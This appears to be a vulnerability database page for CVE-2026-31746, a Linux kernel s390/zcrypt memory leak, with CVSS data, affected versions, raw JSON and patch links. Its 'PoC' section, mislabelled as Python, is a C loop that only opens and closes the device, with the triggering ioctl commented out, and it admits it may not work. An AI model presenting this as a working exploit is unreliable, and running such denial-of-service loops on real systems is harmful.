Security Vulnerability Report
中文
CVE-2026-31746 CVSS 5.5 MEDIUM

CVE-2026-31746

Published: 2026-05-01 15:16:37
Last Modified: 2026-05-07 19:29:56
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: s390/zcrypt: Fix memory leak with CCA cards used as accelerator Tests showed that there is a memory leak if CCA cards are used as accelerator for clear key RSA requests (ME and CRT). With the last rework for the memory allocation the AP messages are allocated by ap_init_apmsg() but for some reason on two places (ME and CRT) the older allocation was still in place. So the first allocation simple was never freed.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel (s390架构, 修复提交 586222c37d40 之前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-31746 (Conceptual) * Triggers memory leak in s390/zcrypt by sending continuous RSA requests. * Requires: s390 architecture, CCA card, zcrypt module loaded. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #define ZCRYPT_DEVICE "/dev/zcrypt90" int main() { int fd = -1; int iterations = 0; printf("Starting PoC for CVE-2026-31746...\n"); // Loop to trigger the memory leak indefinitely while (1) { fd = open(ZCRYPT_DEVICE, O_RDWR); if (fd < 0) { perror("Failed to open device"); sleep(1); continue; } // In a real scenario, specific IOCTLs would be used to send // clear key RSA requests (ME/CRT) to the CCA card. // This simulates the trigger. // ioctl(fd, ZCRYPT_IOCTL, ...); // The vulnerability occurs inside the kernel handling of these requests. // Simply opening/closing or sending dummy requests may not trigger it // without the correct crypto setup, but this represents the loop. close(fd); iterations++; if (iterations % 1000 == 0) { printf("[+] Sent %d requests. Check kernel memory usage (slabtop).\n", iterations); } } return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31746", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:37.363", "lastModified": "2026-05-07T19:29:56.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/zcrypt: Fix memory leak with CCA cards used as accelerator\n\nTests showed that there is a memory leak if CCA cards are used as\naccelerator for clear key RSA requests (ME and CRT). With the last\nrework for the memory allocation the AP messages are allocated by\nap_init_apmsg() but for some reason on two places (ME and CRT) the\nolder allocation was still in place. So the first allocation simple\nwas never freed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16", "versionEndExcluding": "6.18.22", "matchCriteriaId": "B376ADEA-99DD-4C34-B0B2-7362FBE63A29"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/586222c37d4027dbf60a604fbe820184fee7c1c9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ace37bfec3822033e59fff390f2ff99fc96ebe4f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c8d46f17c2fc7d25c18e60c008928aecab26184d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.